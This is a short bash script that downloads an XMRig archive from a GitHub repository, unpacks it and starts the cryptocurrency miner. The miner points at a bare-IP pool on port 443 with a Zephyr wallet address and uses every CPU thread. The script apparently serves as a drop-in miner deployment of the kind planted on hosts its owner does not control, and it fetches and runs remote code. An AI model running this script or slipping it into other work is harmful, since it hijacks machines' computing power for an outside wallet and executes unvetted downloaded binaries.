#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 172.105.125.134:443 -u ZEPHsDAvrXU2igJLGdFhaU7JtLog7nEmPBNT19bJAwjxBcS86Pg2Gjp5wZDqvRfp76V4YSyjYQ3pqV8dWij1LjpT4WP6zYzMRDc -p NAHO -a rx/0 -t $(nproc --all)